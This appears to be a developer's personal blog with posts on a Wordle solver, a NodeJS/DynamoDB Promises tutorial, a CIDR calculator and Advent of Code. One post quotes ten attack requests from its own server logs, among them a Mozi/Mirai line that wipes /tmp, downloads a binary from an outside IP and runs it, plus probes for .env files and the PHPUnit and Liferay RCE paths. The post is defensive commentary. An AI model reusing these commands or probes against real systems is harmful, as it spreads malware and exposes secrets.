Side Project: Wordle Solver

TLDR: a side-project Wordle Solver, and the GitHub repository (with files/lines specifically linked throughout the rest of this post).

A New Side Project

“Side projects are good and fun.  So is Wordle.”

I always try to have a side-project in the mix.  In software development it’s quite important to stay pliable (a la Tom Brady), adaptable, and stay current to the latest in software languages, frameworks, and hosting paradigms (not necessarily Cloud just for the sake of ‘Cloud’).  It’s also important from a Product aspect.  With a side project you (as an engineer/technologist) have total control over the direction of the implementation.  The act of organizing/prioritizing what you want to implement can vastly help in your professional life where there is not as much control over the direction of Product (but on your own you will have recognized pitfalls, best-practices, or tools.)  And the value goes 4x when you collaborate on a side-project with 1+ other people.

Wordle Trie Search

“Using less electricity is good.”

One day my former roommate from college (Alex, a very bright computer scientist) sent me a text with a link to his Github repository.  He had a very advanced start on a Wordle guess validation algorithm, implemented using a recursively traversable trie structure containing ~all/most of the English words in the 5 character space.  (What’s nice about search trees is that search operations are much more efficient than a naive/linear approach.)

From the Wikipedia article Trie
Credit: Booyabazooka (based on PNG image by Deco).  Modifications by Superm401., Public domain, via Wikimedia Commons

Immediately I’m mentally committed.  This Wordle thing had taken off, I had played it a couple times and I loved the idea of being able to work with Alex again and build something in the Wordle arena. 

Updating the Algorithm

“He will win who knows when to fight and when not to fight.”— Sun Tzu

Alex had the algorithm at an 80% complete state.  Though we recognized it was not using all the information of a guess which had a correct letter but wrong location.  This code change/commit fixed the algorithm and would preclude unnecessary traversals of the trie.

For the Internet

Real artists ship.”— Steve Jobs

(No I’m not claiming to be an artist.  Just a technologist.)

I didn’t start this project, so I went looking for how I could bring extra value (i.e. enter a space for implementation that wasn’t being served yet).

Software is useless unless you have a channel to distribute it.  That’s why the Internet is so valuable.  Professionally I was already very familiar with the Java Spring framework, so I committed myself to creating a REST API to expose the underlying algorithm.

I created a Spring sub-project within the same repo, and referenced the algorithm and supporting files using symlinks which actually worked with the build!  I thought this was a neat way to include Alex’s code.  (I don’t know if I would recommend this approach professionally, it’s a little hacky.)

Automated Testing

They test it.  Exactly.

A nice addition by our third collaborator, Tyler, brought in some github workflows driving some unit tests.  This helped identify if anything was broken by a feature/bugfix branch.  Bonus: the unit tests in the ‘sub-project’ Spring application could be run consecutively after the root level tests.

For the Internet, take two

Wrapping the algorithm in Spring was not the correct idea.  I had not thought through on how I wanted to host the application.  An executable jar could have been compiled, but would have needed a virtual host or container to run on.  So instead I spent a weekend to wrap the algorithm a second time but using the AWS Lambda Handler so it could be run serverless.  (This could cut low-traffic hosting from $20/month down to about $2.)  Also some AWS ClouFormation automation helped (from an AWSDocs repo) with the iteration and deployments.  Though I manually integrated an API GW to the Lambda.

Front End

“If there’s a ‘trick’ to it, the UI is broken.”— Douglas Anderson

A little Bootstrapv4 CSS can go a long way, visually.  I’m not a front-end developer but being able to sling together some bare HTML, Bootstrap, forms and JQuery:ajax makes possible a lot of webapp creation.

I also included a fun animated background from a codepen project.

The HTML page is completely static and I uploaded to AWS S3 and aliased a Route53 record for a domain I own.

Lastly, it’s not quite a security thing (rather towards exclusivity), I modified the application to include an Access-Control-Allow-Origin in the header for every request to the API/algorithm.  This will instruct browsers to stop other websites from using my API, though anyone could curl against it if desired.  Or the repository is public, someone could deploy their own Lambda!

Thanks, and Wordle on!

10 Malicious Requests Against My Web Application

During a recent coding experiment/competition I had a (very rough) NodeJS app which I needed to deploy and host. Horror of horrors, I manually installed it onto a bare EC2 and pointed an Elastic-IP. Using pm2 (process manager) I was up and running very quickly, and writing request logs locally.

PORT=8080 pm2 start bin/www --time --output ~/log.txt

What’s nice about running on IaaS (vs. PaaS) is there’s a lot more control and insights. Specifically the log.txt named above. I could see the legitimate requests and traffic hitting my app from my colleague coders, but there were a lot of other requests causing my application to return 404 Not Found. I was curious and started duckduckgo‘ing and discovered a lot of them were attempted web exploits hoping my server was vulnerable.

Below are ten malicious requests narrated with some of my cursory research.

I don’t claim deep expertise in any of these attacks or technologies. (Please note my non-authoritative tone where I’ve written “I believe”.) Cybersecurity is a very deep field, and if I was architecting a truly critical system there are many tools or appliances which can recognize and block such threats or malicious requests instead of my naively exposed EC2 instance. While it was entertaining to do the research below, I could have spent days looking deeper and learning about the history of each vulnerability or exploit.

Bonus: I have this list hosted in a public github repository, and I would welcome any pull requests to help correct, inform, or expand on anything below.

1) PHP and MySQL

2021-04-25T10:19:17: GET /mysql/index.php?lang=en 404 0.940 ms - 1103

PHP is a very common framework in the web development community, and there are many sites describing how it can integrate with mySQL. ‘Index’ here with the php extension implies some code process and not simply fetching a static resource (such as an HTML file). Since this is under the mysql resource, it appears to be a big sniff to see if a console to the mysql db has been left open.

2) Mirai malware, bashdoor and arbitrary code execution

2021-04-25T10:21:27: GET /shell?cd+/tmp;rm+-rf+*;wget+http://172.36.40.208:44947/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.964 ms - 1103

Immediately one can recognize the shell resource, that this is a flavor of a bashdoor attack or attempting to insert and invoke arbitrary code at the command line level. It first tries to clear out everything in the ‘tmp’ direcotry (cd /tmp; rm -rf *) before fetching (wget) a remotely hosted file (‘Mozi.a`, part of the Mirai botnet) and then tries to invoke.

3) AWS Metadata (not malicious)

2021-04-25T11:17:53: GET http://169.254.169.254/latest/meta-data/ 404 1.033 ms - 1103

Not an attack, rather something particular to AWS EC2 instance metadata. I believe it’s the AWS SDK (within my NodeJS application) locally looking for the metadata containing the AWS credentials (since my web app was integrated with DynamoDB). Noteworthy is the IP 169.254.169.254 is special to every EC2 instance.

4) “The Moon” against Linksys Devices

2021-04-25T11:49:04: POST /HNAP1/ 404 0.837 ms - 1103

Home Network Administration Protocl (HNAP) is a Cisco proprietary protocol for managing network devices, going back to 2007. There was a worm, “The Moon”, back in 2014, which used the HNAP1 protocol to identify specific Linksys routers (firmware etc.), and then send a second request to invoke an exploit at the CGI/script level which downloads the worm’s script.

5) Sniffing for Environment Variables

2021-04-25T14:57:06: GET /.env 404 0.919 ms - 1103

The .env file is not specific to one framework or language, but actually closer to industry convention. I think this request is hoping that the server is simply hosting a directory and that an .env might be exposed possibly revealing things like API keys or credential keys/tokens.

6) “Hey, look at my ads!!!”

2021-04-25T17:00:00: POST http://likeapro.best/

I tried the URl, and it was a ‘Not Found’, so maybe it was shut down or abandoned. Maybe someone is hoping to get more traffic to a site laden with ads. More nuisance than malice.

7) WiFi Cameras Leaking admin Passwords

2021-04-25T18:04:09: GET /config/getuser?index=0 404 0.940 ms - 1103

Specific D-Link WI-fi cameras had a vulnerability where the remote administrator password could be directly queried without authentication! Hoorah for the National Vulnerability Database (NIST), the page for this vulnerability in particular was fun to read through and click the links deeper into the vulnerability and who/how it was uncovered.

8) PHP Unit Test Framework Weakening Prod

2021-04-25T20:12:45: POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 1.083 ms - 1103

This is a vulnerability for specific version of PHPUnit, where arbitrary PHP code could be executed! (Good example why modules specific to testing should be disabled or omitted in production deployments.) Here’s a very detailed story (by a PHP expert), on how this impacted a retail website. The first link is to cve.mitre.org, a vulnerability catalog sponsored by USA’s DHS and CISA, and the actual site is maintained by the MITRE Corp.

9) JSON Deserialization Vulnerability

2021-04-25T20:12:45: POST /api/jsonws/invoke 404 0.656 ms - 1103

Liferay is a digital portal/platform product, which had a JSON (deserialization) and remote code execution vulnerability (CVE-2020-7961) in March of 2020 and documented by Code White. Bonus, here’s the scanner (github) of a scanner someone created for this vulnerability.

10) Apache Solr Exposing Files

2021-04-25T20:12:45: GET /solr/admin/info/system?wt=json 404 0.989 ms - 1103

Ranked as the #7 Web Service Exploit of 2020, even though Apache published an issue back in 2013! The above request is a scan looking for specific versions of Apache Solr (search platform), where a particular parameter is exposed and can lead to arbitrary file reading. Apparently this is combined with some other vulnerabilities to eventually get to remote code execution, detailed in CVE-2013-6397.

NodeJS, DynamoDB, and Promises

NodeJS, Express, and AWS DynamoDB: if you’re mixing these three in your stack then I’ve written this post with you in mind.  Also sprinkled with some Promises explanations, because there are too many posts that explain Promises without a tangible use case.  Caveat, I don’t write in ES6 form, that’s just my habit but I think it’s readable anyways. The examples below are all ‘getting’ data (no PUT or POST), but I believe it’s still helpful for setting up a project. All code can be found in my github repo.

Level Set

Each example in this post will be a different resource in an express+EJS app, but they’ll all look similar to the following (route and EJS code, respectively):

//  routes/index.js

router.get('/', function(req, res, next) {
 res.render('index', { description: 'Index', jay_son: {x:3} } );
});

(Apologies for the non-styled code. You can view the routes/index.js file in my repo.)

<!-- views/index.ejs -->
 
<body>
   <h1><%= description %></h1>
   <code><%= JSON.stringify(jay_son,null,2) %></code>
 </body>

http://localhost:3000/

Index
{ "x":3 }

(If any of this looks foreign or confusing, you’ll probably need to backup and study NodeJS, Express and EJS.)

Basic Promise

First up, a very simple Promise that doesn’t really do anything.  But this is how it gets used:

async function simplePromise() {
   return Promise.resolve({resolved:"Promise"});
}
router.get('/simple_promise', function(req, res, next) {
 simplePromise().then( function(obj) {
   res.render('index', 
     { description: 'Simple Promise', jay_son: obj });
 });
});

http://localhost:3000/simple_promise

Simple Promise
{ "resolved":"Promise" }

The simplePromise function returns the Promise, and the value has already been computed (because it’s static data).  The route accesses the value under the then() function and we pass obj to the view for rendering.

Get Single DynamoDB Item

For the rest of this post I’m using two dynamoDB tables.  This is not a data model I would take to a client.  It’s inefficient. Rather this data is meant for illustrative purposes only for when JSON storage is a suitable use for your tech stack:

d_bike_manufacturers //partition key 'name'
  { "name":"Fuji", "best_bike":"Roubaix3.0" }
  { "name":"Specialized", "best_bike":"StumpjumperM2" }
  
d_bike_models       //partition key 'model_name'
  { "model_name":"Roubaix3.0", "years":[ 2010, 2012 ] }
  {"model_name":"StumpjumperM2",
   "years":[1993,1994,1995,1996,1997,1998,2000]
  }

Back to the NodeJS code:

const AWS = require("aws-sdk")
AWS.config.update({ region: "us-east-1" })
const dynamoDB = new AWS.DynamoDB.DocumentClient();

// '/manufacturer'
router.get('/manufacturer', function(req, res, next) {
 var params = { Key: { "name": req.query.name_str }, 
                TableName: "d_bike_manufacturers" };
 dynamoDB.get(params).promise().then( function(obj) {
   res.render('index', 
     { description: 'Simple Promise', jay_son: obj }
   );
 });
});

http://localhost:3000/manufacturer?name_str=Fuji

Single DynamoDB Item
{
   "Item":{
      "name":"Fuji",
      "best_bike":"Roubaix3.0"
   }
}

Very important to note here is how the return data is wrapped within a structure under the key ‘Item’.

Consecutive DynamoDB GETs

If the ultimate database item is not immediately query-able (for some reason), then consecutive DynamoDB calls can be made.  Notice how the Promises are nested.  From the perspective of performance, this is not desirable and can introduce a lot of latency if this pattern is further repeated.  (Some basic testing I did showed P95 times of around 100ms, server side.)  The point of this demonstration is that the first Promise needs to resolve before the second can be constructed. (Best to avoid such consecutive queries, but we’re illustrating here.)

// '/manufacturers_best_bike'
router.get('/manufacturers_best_bike', function(req, res, next) {
 
  var params = { Key: { "name": req.query.name_str }, 
                 TableName: "d_bike_manufacturers" };
 dynamoDB.get(params).promise().then( function(obj) {
   if (Object.keys(obj).length==0) {
     res.render('index', 
       { description: 'Consecutive DynamoDB Items', 
         jay_son: {err: "not found"} 
     });
     return;
   }
 
   var bikeName = obj.Item.best_bike;
   var params2 = { Key: { "model_name": bikeName }, 
                   TableName: "d_bike_models" };
   dynamoDB.get(params2).promise().then( function(obj2) {
     res.render('index', 
       { description: 'Consecutive DynamoDB Items', 
         jay_son: obj2 }
     );
   });
 });
});

http://localhost:3000/manufacturers_best_bike?name_str=Fuji

Consecutive DynamoDB Items
{
   "Item":{
      "model_name":"Roubaix3.0",
      "years":[ 2010, 2012 ]
   }
}

Promise.all()

Promises aren’t strictly run in parallel, rather the creation of the Promise starts the respective work.  Using the all() method simply waits for all to resolve and can make your code look a lot cleaner.  In the resource below, we’re querying DynamoDB twice using information from the supplied query parameters.

// '/manufacturer_and_bike'
router.get('/manufacturer_and_bike', function(req, res, next) {
  // Two query params
 var params = { Key: { "name": req.query.name_str }, 
                TableName: "d_bike_manufacturers" };
 var params2 = { Key: { "model_name": req.query.bike_str }, 
                 TableName: "d_bike_models" };
 
 var promises_arr = [
   dynamoDB.get(params).promise(),
   dynamoDB.get(params2).promise()
 ];
 
 Promise.all(promises_arr).then( function(obj) {
   res.render('index', 
     { description: 'Promise.all() for Concurrency', 
       jay_son: obj } );
 });
});

http://localhost:3000/manufacturer_and_bike?name_str=Fuji&bike_str=Roubaix3.0

Promise.all() for Concurrency
[
   {
      "Item":{
         "name":"Fuji",
         "best_bike":"Roubaix3.0"
      }
   },
   {
      "Item":{
         "model_name":"Roubaix3.0",
         "years":[ 2010, 2012 ]
      }
   }
]

Note how the items are returned in an array, and in the order of the array of Promises.  One gotcha with Promise.all() is that it’s ‘all’ or nothing, and you’ll need to ‘catch’ if any one of the promises fail.

DynamoDB BatchGet

Using the AWS SDK to perform more of the data operations on the Cloud side is always a good idea.  Instead of iterating over many keys, include all the keys in a single request.  Note the form of the params object allowing us to query multiple tables.

// '/manufacturers' (batch get)
router.get('/manufacturers', function(req, res, next) {
 var manufTableName = "d_bike_manufacturers";
 var manufacturers_array = req.query.names_str.split(",");
 var bikeTableName = "d_bike_models";
 var bikes_array = req.query.bikes_str.split(",");
 
 var params = { RequestItems: {} };
 params.RequestItems[manufTableName] = {Keys: []};
 for (manufacturer_name of manufacturers_array) {
   params.RequestItems[manufTableName].Keys.push( 
     { name: manufacturer_name } );
 }
 params.RequestItems[bikeTableName] = {Keys: []};
 for (bike_name of bikes_array) {
   params.RequestItems[bikeTableName].Keys.push( 
     { model_name: bike_name } );
 }
 console.log(JSON.stringify(params,null,2));
 
 dynamoDB.batchGet(params).promise().then( function(obj) {
   res.render('index', 
     { description: 'DynamoDB BatchGet', jay_son: obj }
   );
 });
});

Output from console.log(JSON.stringify(params,null,2));

{
   "RequestItems":{
      "d_bike_manufacturers":{
         "Keys":[ { "name":"Fuji" }, { "name":"Specialized" } ]
      },
      "d_bike_models":{
         "Keys":[ { "model_name":"Roubaix3.0" }, 
                  { "model_name":"StumpjumperM2" } 
                ]
      }
   }
}

http://localhost:3000/manufacturers?names_str=Fuji,Specialized&bikes_str=Roubaix3.0,StumpjumperM2

DynamoDB BatchGet
{
  "Responses": {
    "d_bike_models": [
      {
        "model_name": "StumpjumperM2",
        "years": [
          1993,
          1994,
          1995,
          1996,
          1997,
          1998,
          2000
        ]
      },
      {
        "model_name": "Roubaix3.0",
        "years": [
          2010,
          2012
        ]
      }
    ],
    "d_bike_manufacturers": [
      {
        "name": "Specialized",
        "best_bike": "StumpjumperM2"
      },
      {
        "name": "Fuji",
        "best_bike": "Roubaix3.0"
      }
    ]
  },
  "UnprocessedKeys": {}
}

Summary

A little JSON can go a long way especially when building an MVP, or dealing with unstructured data. IMHO NodeJS + DynamoDB is a very powerful pairing to facilitate this data in your AWS premise.

Happy coding.

Subnet CIDR Coverage Calculator

Oh no…. Not another CIDR calculator, because there really are a bunch.

Allow me to advocate for my app CIDRizer, focused on CIDR space coverage. If one has a CIDR block (account, VPC, etc.), and their engineers take a little slice here and there (of varying mask size and probably not consecutive), how can one actually see what’s left?

Example (CIDRizer input):

10.10.10.0/24   # Overall Account/VPC

10.10.10.32/29  # Jim's tests
10.10.10.128/29 # dev4a
10.10.10.160/28 # Ruth's team

… can be completely covered/represented as follows (CIDRizer output):

Account

CIDR2^(32-n)Avail.FirstLast
10.10.10.0/2425625410.10.10.010.10.10.255

Simplest Coverage CIDR Blocking (SCCB)

CIDR2^(32-n)Avail.FirstLast
10.10.10.0/27323010.10.10.010.10.10.31
10.10.10.32/298610.10.10.3210.10.10.39
10.10.10.40/298610.10.10.4010.10.10.47
10.10.10.48/28161410.10.10.4810.10.10.63
10.10.10.64/26646210.10.10.6410.10.10.127
10.10.10.128/298610.10.10.12810.10.10.135
10.10.10.136/298610.10.10.13610.10.10.143
10.10.10.144/28161410.10.10.14410.10.10.159
10.10.10.160/28161410.10.10.16010.10.10.175
10.10.10.176/28161410.10.10.17610.10.10.191
10.10.10.192/26646210.10.10.19210.10.10.255

Algorithm & Code

I have made the repository public, with an ISC license. This unit test file details what the core algorithm is doing (and can be run via npm test), the rest of the project’s code is simply enabling it as a NodeJS web app.

Run / Deploy

As usual npm start, but there’s a serverless.yml which is what I’ve used to deploy it to my domain CIDRizer.com.

That’s it. My contribution to the CIDR calculator space.

Advent of Code 2020: Day 18 Order of Operations (Arithmetic)

As I had written in a previous blog post, I participated in the Advent of Code, 25 programming problems to help improve my skills. I maintained really good momentum through day 20 before holiday activities forced me to pause. (Bonus: I have 5 really solid problems to play with for the next month.)

One of the best aspects of such a side activity is discussing the problems with some of my colleagues, and seeing the different approaches. It was important we treated the discussion as a open and safe space. Of course there are wrong answers, the underlying problem needs to be solved. But there are many different ways to approach and implement the solution including non-optimal ones. It was not meant to be a code golf challenge: rather by experimenting with unfamiliar aspects of our programming languages and solving abstract problems, we deepened our expertise.

I particularly enjoyed problem Day 18. Perhaps you remember your PEMDAS (order of arithmetic operations) from junior high. The Day 18 problem jumbled the notion of PEMDAS and asked to evaluate expressions if operations were evaluated “strictly left to right” or “addition comes before multiplication.” (The horror…)

My solution involved mapping the ‘depth’ of an expression wrt parentheses, then building a method to do the custom expression evaluation. Wrapping the two in iteration, I could then slice, divide, and conquer the expression to obtain the final result. Here’s an example of an expression, where the updated depth map is followed by the sliced expression selected for evaluation and finally replaced. This keeps drilling down until the entire expression has been evaluated:

### addition before multiplication ###

 (3+6+7+9)*(2+(4*7*6+9+3+5)+9+(2+3+7+4+3)+9)+8

"(3+6+7+9)*(2+(4*7*6+9+3+5)+9+(2+3+7+4+3)+9)+8"
 111111111011122222222222221112222222222211100
               4*7*6+9+3+5
               644
              ___
"(3+6+7+9)*(2+644+9+(2+3+7+4+3)+9)+8"
 11111111101111111112222222222211100
                     2+3+7+4+3
                     19
                    __
"(3+6+7+9)*(2+644+9+19+9)+8"
 11111111101111111111111100
  3+6+7+9
  25
 __ 
"25*(2+644+9+19+9)+8"
 0001111111111111100
     2+644+9+19+9
     683
    ___
"25*683+8"

line_value: 17275 

How did my colleagues approach this?

  • David – used a clever regex to find the ‘deepest’ pair of parentheses, then evaluated the contained expression, and repeat as long as there was a ‘(‘ character remaining in the expression.
  • Josh – employed a similar regex recognition, but wrapped his solution in a very tidy `map()` for an almost minified look. By using less memory, Josh is minimizing his electricity consumption and saving the environment!

Advent of Code 2020: A Challenge Ahead of the Holidays

It’s important to continually hone your own skills true to being a true professional. Credit to my colleague David Lozzi for bringing Advent of Code 2020 to my attention, to which I immediately knew I had to partake.

Daily coding challenges are posted while the site interweaves some stats, socialization, and leader boards. My personal goals:

  • Complete all 25 challenges
  • Try a new language for at least one challenge

For example, the Day 3 challenge: ‘ski’ down a grid thousands of lines long and count the number of trees encountered for a specified slope…

Please check out my solutions on GitHub (all JS so far, and my solution to the Day 3 challenge) or follow along. After only three days I’ve already found it incredible revealing to see how my fellow Slalom colleagues have solved the same problem with different languages, approaches, and personal coding style.

Happy Coding!

Merry Christmas!

Happy New Year!